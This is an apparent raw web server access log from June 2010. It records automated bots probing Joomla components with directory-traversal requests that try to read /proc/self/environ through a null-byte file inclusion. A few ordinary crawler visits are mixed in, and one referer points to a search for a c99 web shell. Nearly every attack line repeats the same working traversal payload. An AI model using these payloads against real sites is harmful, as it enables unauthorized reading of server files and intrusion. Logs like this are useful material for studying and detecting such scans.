69.162.118.240 - - [28/Jun/2010:04:26:42 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
94.155.49.192 - - [28/Jun/2010:04:26:53 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
92.42.26.140 - - [28/Jun/2010:04:27:04 -0500] "GET /logs/access_log.1271376000 HTTP/1.1" 200 655360 "http://yandex.ru/yandsearch?clid=14585&text=http://www.idasy.com/c99.txt&lr=2""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.60"
91.121.21.189 - - [28/Jun/2010:04:27:12 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:27:12 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:27:13 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
78.41.233.128 - - [28/Jun/2010:04:27:21 -0500] "GET /logs/access_log.1275004800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:27:21 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:27:21 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:27:32 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [28/Jun/2010:04:27:35 -0500] "GET /logs/access_log.1188086400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.21.189 - - [28/Jun/2010:04:27:44 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:27:44 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:27:45 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
69.162.118.240 - - [28/Jun/2010:04:27:48 -0500] "GET /logs/access_log.1275696000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:04:27:48 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:04:27:48 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
94.247.176.194 - - [28/Jun/2010:04:28:21 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:28:22 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:28:22 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:28:33 -0500] "GET /logs/access_log.1276473600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:29:12 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:29:12 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:29:12 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:29:22 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:29:23 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:29:23 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:29:44 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:30:10 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:30:16 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:30:24 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
78.41.233.128 - - [28/Jun/2010:04:31:00 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:31:00 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:31:00 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:31:18 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:31:18 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:31:18 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:31:32 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:31:33 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:31:33 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:31:37 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:31:37 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:31:39 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:32:00 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:32:00 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:32:00 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:32:16 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:32:27 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
78.41.233.128 - - [28/Jun/2010:04:32:28 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:32:28 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:32:29 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:32:29 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:32:29 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:32:29 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:32:58 -0500] "GET /logs/access_log.1276473600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:33:00 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:33:00 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:33:00 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:33:27 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:34:27 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:34:27 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:34:28 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:34:28 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:34:28 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:34:28 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
74.125.74.131 - - [28/Jun/2010:04:34:36 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13"
78.41.233.128 - - [28/Jun/2010:04:35:11 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:35:11 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:35:11 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:35:14 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.199.184 - - [28/Jun/2010:04:35:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.41.233.128 - - [28/Jun/2010:04:35:21 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:35:25 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:35:26 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:35:27 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:35:27 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:35:43 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:35:43 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:35:43 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:36:03 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:36:32 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:36:32 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:36:33 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:37:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:37:32 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:37:32 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:37:32 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:37:54 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:38:46 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:38:46 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:38:46 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:38:51 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:40:02 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:40:09 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:40:13 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:40:13 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:40:13 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:41:13 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:41:13 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:41:13 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.2.252.33 - - [28/Jun/2010:04:41:27 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:41:42 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:44:29 -0500] "GET /logs/access_log.1274400000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:47:04 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:47:04 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
